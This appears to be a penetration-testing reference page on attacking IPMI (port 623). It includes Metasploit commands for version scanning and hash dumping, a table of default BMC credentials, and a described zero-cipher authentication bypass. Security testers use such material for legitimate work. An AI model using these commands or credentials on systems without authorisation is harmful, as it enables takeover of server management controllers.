623 - IPMI

Intelligent Platform Management Interface (IPMI) is a set of computer interface specifications for an autonomous computer subsystem that provides management and monitoring capabilities independently.

Metasploit

Find version

msf > use auxiliary/scanner/ipmi/ipmi_version
msf auxiliary(ipmi_version) > set RHOSTS 10.0.0.0/24
msf auxiliary(ipmi_version) > run
[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)
[+] 10.0.0.22:623 - IPMI - IPMI-2.0 UserAuth(auth_user,non_null_user) PassAuth(md5,md2)Level(1.5,2.0)

Dump hashes

use auxiliary/scanner/ipmi/ipmi_dumphashes 
set rhosts [TARGETS] 
run

Common default credentials

Product Name

Default Username

Default Password

HP Integrated Lights Out (iLO)

Administrator

<factory randomized 8-character string>

Dell Remote Access Card (iDRAC, DRAC)

root

calvin

IBM Integrated Management Module (IMM)

USERID

PASSW0RD (with a zero)

Fujitsu Integrated Remote Management Controller

admin

admin

Supermicro IPMI (2.0)

ADMIN

ADMIN

Oracle/Sun Integrated Lights Out Manager (ILOM)

root

changeme

ASUS iKVM BMC

admin

admin

Resources: https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/

Zero cipher authentication bypass

Zero cipher authentication bypass resulting in administrative access

Check if vulnerable

Connect

The Linux ipmitool client is used to interact with the service and bypass authentication (via the -C 0 option).

We will set the root user account password to abc123 via IPMI.

Previous512/513/514 - R ServicesNext873 - RSYNC

Last updated

Was this helpful?